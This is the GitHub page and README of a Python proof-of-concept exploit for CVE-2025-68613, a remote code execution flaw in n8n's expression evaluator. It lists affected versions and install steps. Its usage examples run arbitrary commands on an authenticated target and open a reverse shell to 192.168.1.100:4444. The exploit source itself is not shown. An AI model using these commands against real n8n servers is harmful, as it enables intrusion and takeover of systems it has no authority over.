Skip to content

JohannesLks/CVE-2025-68613-Python-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

CVE-2025-68613: n8n Workflow Expression RCE

Proof of Concept (PoC) exploit for a critical Remote Code Execution vulnerability in the n8n workflow automation platform.

Description

The vulnerability exists in the n8n expression evaluation system. User-supplied expressions are not properly sandboxed, allowing authenticated attackers to execute arbitrary code on the host system.

CVE ID: CVE-2025-68613
Vulnerability Type: Remote Code Execution (RCE)
Component: Expression Evaluator

Affected Versions

  • n8n >= 0.211.0
  • n8n < 1.120.4
  • n8n < 1.121.1
  • n8n < 1.122.0

Installation

git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt

Usage

Syntax

python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]

Arguments

  • -t, --target : Target URL (e.g., http://localhost:5678)
  • -u, --username : n8n account email address
  • -p, --password : n8n account password
  • -c, --cmd : System command to execute
  • --reverse-shell : Trigger a reverse shell (Format: IP PORT)

Examples

Check vulnerability / Execute command:

python3 n8n_exploit.py -t http://target:5678 -u admin@example.com -p "P@ssword123" -c "id"

Establish Reverse Shell:

python3 n8n_exploit.py -t http://target:5678 -u admin@example.com -p "P@ssword123" --reverse-shell 192.168.1.100 4444

About

Python Exploit for CVE-2025-68613.

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages